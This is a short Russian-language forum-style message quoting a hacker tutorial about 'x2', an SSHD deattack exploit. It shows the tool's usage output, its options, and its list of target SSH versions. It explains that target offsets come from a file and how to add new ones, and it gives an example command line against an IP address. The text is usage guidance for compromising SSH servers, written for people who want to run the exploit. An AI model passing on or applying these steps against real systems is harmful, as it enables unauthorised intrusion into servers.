П.С. : нашел вот это, почитай на досуге

взято с http://www.madalf.ru/doc2/b6.shtm

1. x2. Очень популярный эксплойт к sshd сервису. Одно время был гордостью трейдеров, а уж они чего только не делали: создавали x3 и x4 и т.д., отличавшиеся списком target'ов, добавляли сканер на уязвимые ssh серверы.

[root@www zl0]#./x2

SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Usage: sshd-exploit -t# <options> host [port]

Options:

-t num (mandatory) defines target, use 0 for target list

-X string skips certain stages

[root@www zl0]#

Помимо самого бинарника, с ним идет файл targets, содержащий готовый набор offset'ов для различных версий sshd. Их можно легко добавлять самому (принцип добавления можно посмотреть на основе уже готовых офсетов). Просмотреть список доступных target'ов можно по команде:

[root@www zl0]#./x2 -t 0

SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Targets:

( 1) Small - SSH-1.5-1.2.24

( 2) Small - SSH-1.5-1.2.25

( 3) Small - SSH-1.5-1.2.26

...

Example: [root@www zl0]#./x2 -t 1 123.123.123.123

Эксплойт работает только на Linux, хотя ходят слухи, что существует версия, работающая на *BSD системах. Когда будешь его использовать, не обольщайся: он будет работать на любом сервере, но на одном может пройти, а на втором после продолжительного bruteforce'a обломаться.